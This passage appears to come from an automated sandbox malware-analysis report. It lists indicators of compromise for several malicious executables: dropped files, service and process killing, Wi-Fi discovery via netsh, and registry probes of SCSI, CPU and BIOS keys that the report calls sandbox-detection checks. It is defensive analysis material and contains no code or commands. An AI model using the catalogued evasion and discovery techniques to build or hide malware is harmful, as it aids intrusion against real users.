ASUFER.exe File created C:\Windows\ehome\wmild.exe ASUFER.exe File created C:\Windows\sysppvrdnvs.exe twztl.exe -
Launches sc.exe 11 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2840 sc.exe 2524 sc.exe 5672 sc.exe 5908 sc.exe 5440 sc.exe 3384 sc.exe 3760 sc.exe 3516 sc.exe 2924 sc.exe 4088 sc.exe 5880 sc.exe -
Detects Pyinstaller 3 IoCs
resource yara_rule behavioral2/files/0x0009000000023c13-2961.dat pyinstaller behavioral2/files/0x000200000001d9c4-3133.dat pyinstaller behavioral2/files/0x000600000001e4d3-3573.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Program crash 2 IoCs
pid pid_target Process procid_target 4956 3576 WerFault.exe 123 3312 5200 WerFault.exe 503 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pimer_bbbcontents7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2563814828.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AA_v3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language subin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AA_v3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ASUFER.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1707518023.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language yoyf.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language subin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language subin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sysppvrdnvs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language subin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language clsid.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1094527981.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3135025858.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bundle.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Discord.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1712418979.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2537816796.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language legas.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4363463463464363463463463.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language random.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AA_v3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2751933726.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language newtpp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 323862848.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sysnldcvmr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Discord.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language utility-inst.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 3784 cmd.exe 5860 netsh.exe -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 dwm.exe -
Checks processor information in registry 2 TTPs 13 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 integrator.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 integrator.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz integrator.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString integrator.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 ONENOTE.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz ONENOTE.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ONENOTE.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz integrator.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString integrator.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 5392 timeout.exe -
Detects videocard installed 1 TTPs 2 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1368 WMIC.exe 4800 WMIC.exe -
Enumerates system info in registry 2 TTPs 36 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily integrator.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU integrator.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS dwm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dwm.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS dwm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dwm.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS dwm.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS dwm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dwm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dwm.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS ONENOTE.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU ONENOTE.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily integrator.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS dwm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dwm.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS dwm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU integrator.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS dwm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dwm.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS dwm.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS integrator.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS integrator.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS dwm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dwm.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS dwm.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS dwm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily ONENOTE.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dwm.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS dwm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dwm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dwm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dwm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dwm.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 5768 systeminfo.exe -
Kills process with taskkill 46 IoCs
pid Process 5028 taskkill.exe 3420 taskkill.exe 4580 taskkill.exe 2708 taskkill.exe 5124 taskkill.exe 1012 taskkill.exe 4632 taskkill.exe 5072 taskkill.exe 2216 taskkill.exe 2416 taskkill.exe 1164 taskkill.exe 3820 taskkill.exe 5828 taskkill.exe 4600 taskkill.exe 4488 taskkill.exe 4596 taskkill.exe 4532 taskkill.exe 5240 taskkill.exe 1740 taskkill.exe 3292 taskkill.exe 3508 taskkill.exe 1116 taskkill.exe 4956 taskkill.exe 4420 taskkill.exe 2828 taskkill.exe 3668 taskkill.exe 4332 taskkill.exe 884 taskkill.exe 5672 taskkill.exe 5908 taskkill.exe 5412 taskkill.exe 4044 taskkill.exe 3652 taskkill.exe 760 taskkill.exe 5872 taskkill.exe 2908 taskkill.exe 3452 taskkill.exe 4596 taskkill.exe 3628 taskkill.exe 3508 taskkill.exe 4616 taskkill.exe 3992 taskkill.exe 2020 taskkill.exe 5812 taskkill.exe 1000 taskkill.exe 3080 taskkill.exe -
Modifies Control Panel 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\Desktop 1712418979.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\Desktop\WallpaperStyle = "10" 1712418979.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ZONE_ELEVATION\OSPPREARM.EXE = "1" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_VALIDATE_NAVIGATE_URL msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_VALIDATE_NAVIGATE_URL\OSPPREARM.EXE = "1" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_VALIDATE_NAVIGATE_URL\LICLUA.EXE = "1" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SAFE_BINDTOOBJECT msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SECURITYBAND msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_SNIFFING msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WINDOW_RESTRICTIONS\LICLUA.EXE = "1" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SECURITYBAND\LICLUA.EXE = "1" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ZONE_ELEVATION\LICLUA.EXE = "1" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_UNC_SAVEDFILECHECK msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING\OSPPREARM.EXE = "1" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESTRICT_ACTIVEXINSTALL\LICLUA.EXE = "1" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WINDOW_RESTRICTIONS msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WINDOW_RESTRICTIONS\OSPPREARM.EXE = "1" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ZONE_ELEVATION msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SAFE_BINDTOOBJECT\LICLUA.EXE = "1" msiexec.exe Set value (int) 